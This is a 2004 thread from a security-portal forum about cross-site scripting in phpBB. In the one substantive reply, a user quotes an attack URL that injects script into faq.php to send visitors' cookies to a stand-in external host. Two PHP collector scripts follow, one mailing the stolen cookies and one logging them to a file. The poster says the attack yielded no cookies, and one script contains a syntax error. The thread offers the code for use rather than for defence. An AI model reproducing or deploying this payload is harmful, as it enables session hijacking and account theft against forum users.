|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
XSS In Phpbb |
|
Posted: Wed Oct 27, 2004 4:00 am |
|
|
terrible one |
Regular user |
|
|
Joined: Jun 25, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Oct 28, 2004 8:24 pm |
|
|
Nicolas |
Regular user |
|
|
Joined: Sep 19, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
You use my script :p
Me too I don't receive any cookie
I don't know were is the probleme, but I hope someone could help us
Quote: | to exploit:
Code: | http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location= 'www.site.com/code_evil.php?cookie=' + window.document.cookie; </script>bar&faq%5b0%5d%5b1%5d=lOeil |
put code_evil.php on www.site.com:
Code: | <?php
$cokie = $_GET['cookie'];
mail('votre_email@hebergeur.com', 'You just stole a cookie', $cokie);
?> |
Or 2nd scrit for evil.php:
Code: | <?php
$cokie = $_GET['cookie']
$fp = fopen('logger.txt','a'); // ouvre le logger.txt
fwrite($fp, '$cokie'); // ?crit les infos du cookie
fclose($fp);
?> |
|
I tested 2 without any cookie :/ |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|